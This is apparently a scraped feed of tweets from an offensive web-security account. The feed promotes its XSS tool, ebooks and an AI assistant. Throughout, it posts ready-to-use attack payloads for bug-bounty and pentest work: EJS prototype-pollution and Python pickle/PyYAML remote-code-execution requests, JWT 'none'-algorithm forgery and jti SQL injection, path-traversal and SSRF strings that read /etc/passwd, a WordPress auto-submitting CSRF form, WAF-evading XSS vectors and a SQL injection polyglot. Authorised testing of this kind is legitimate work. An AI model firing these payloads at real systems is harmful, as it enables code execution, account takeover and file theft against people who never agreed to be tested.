Tweets

3 Methods, 3 Levels

[ base64 ]
YnJ1dGU=

[ AES ]
RmnVLVQ/x45ZbDfUnOp7hw==

[ bcrypt ]
$2b$12$T2hEfL9HDXzS5kZuqvC1hOdzYOsLZnVjs04Fd4/fPLf/kztfYhhSq

#crackme

JWT Auth Bypass TestBed

http://403.brutelogic.net/authz/jwt

Test your skills: 18 main tests with variations.

A proprietary tool with 40+ techniques for Brute One will be available this week to spot all these cases in the wild in a matter of seconds.

https://brutelogic.net/brute-one

Node.js RCE via EJS (<v6.0.0-alpha)

Unsafe merge - Prototype Pollution leading to RCE via template rendering.

{"__proto__":{"client":true,"escapeFunction":"function(){return process.mainModule.require('child_process').spawnSync('id').stdout;};//"}}

#node #rce #cfbypass

JWT SQL Injection

jti (JWT ID) is stored in a DB to prevent token replay.
That lookup is injectable.

"jti": "' OR '1'='1"

Try it: http://403.brutelogic.net/authz/jwt/jti

Full technique: http://brutelogic.net/ebooks/broken-token/jwt/

#hack2earn #bugbounty #jwt

Broken Token - JWT

New ebook, the first of the series.

Master every way to break JSON Web Tokens:

• Algorithm confusion
• Key injection
• Claim manipulation
• Format attacks

+ Original research

Essential for bug bounty hunters & pentesters.

Review Your Recon Skills

1. Test against reKover's testbed

http://recon.brutelogic.net

2. Add reKover to your arsenal

https://github.com/BruteLogic/reKover

- Reduce the noise, increase the signal.

Last call, ending this weekend.

KNOXSS - Comprehensive XSS Tool
http://knoxss.pro

Ebooks - First Bounty, SSRF, Bypass
http://brutelogic.net/ebooks

Brute One - Tool Enabled AI Assistant
http://brutelogic.net/brute-one

#BugBounty #PenTesting

POST /api/update HTTP/1.1
Host: http://target.com
Content-Type: application/x-www-form-urlencoded
Content-Type: application/json

{"test": true}

Python RCE

Pickle
curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}'

PyYAML
curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'

Leaking httpOnly Cookies for ATO

1. Trigger DEBUG errors by adding a [] to a parameter name for example:

?id[]=1

2. Fetch the error page, parse and add the session cookies to the XSS ATO script.

Laravel and C# live samples below (debug enabled).

We provide accurate content on Offensive Cybersecurity for Bug Bounty hunting, Penetration Tests and Vulnerability Assessments.

We schedule our posts for 14:35 GMT.

Turn on notifications on our profile so you don't miss any info that might be useful for your next engagement.

Path Traversal Bypasses

Null Byte Injection
../../../etc/./passwd%00.png

Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd

Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32Fpasswd

Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././

Parsing Confusion - Cloud Pipelines

An AWS API Gateway (policy) and a downstream Node.js Lambda (execution) use different engines.

One layer takes the first value, the other layer takes the second.

Always use TRUE and FALSE at the same time.

/server-status
403 Forbidden

/server%2Dstatus
200 OK

Program: Slack
Year: 2016
Bounty: 2k

#hack2earn

When they think "the frontend handles that".

WP CSRF Hunting Template

<body onload=forms[0].submit()>
<form action=//TARGET/wp-admin/admin-ajax.php method=post>
<input name=action value=NAME>
<input name=_wpnonce value=any>
<!-- add inputs -->

Directions
1. Grep wp_ajax_ in plugin
2. No check_ajax_referer? Fill NAME, fire

JWT NoAlg Bypass (no sig needed)

Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9.

Change the fields accordingly if needed.

echo '{"sub":"admin","role":"admin","admin":true}' | base64 | tr -d '=' | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."

#BugBounty #BrokenAuth

SSRF Payloads for LFR/LFD

file:/etc//passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/./passwd?/../passwd

#CF403

Web search with Brute One
http://brutelogic.net/brute-one

PHP Null Byte on Parameter Trick
Use to fool WAFs that decode before parsing.

It might consider the anchor with dangling (but harmless) markup instead of the real vector.

param%00p%3D<A/Href="<Svg/OnLoad=alert(1)//

More on

PoC https://gym.brutelogic.net/?p05%00p%3D%3CA/Href=%22%3CSvg/OnLoad=alert(1)//

Spray & Pray

and-1/*'/*"/**/||1--\

#SQLi #MySQL

Sharp and accurate content on offensive cybersecurity (web hacking), bug bounty and AI.

Don't miss anything — check our timeline from time to time or hit the bell to get notified.

Found mobile UI bugs on @Hacker0x01. Reporting now, hope they are responsive.

AI will only replace you if all you do is to run tools.

Brute May - 50% OFF

Coupon Code
BRUTE50

KNOXSS
https://knoxss.pro

Brute One
https://brutelogic.net

Ebooks
https://brutelogic.net/ebooks

Valid until May 31st 2026.
#XSS #SSRF #Bypass #AI #BugBounty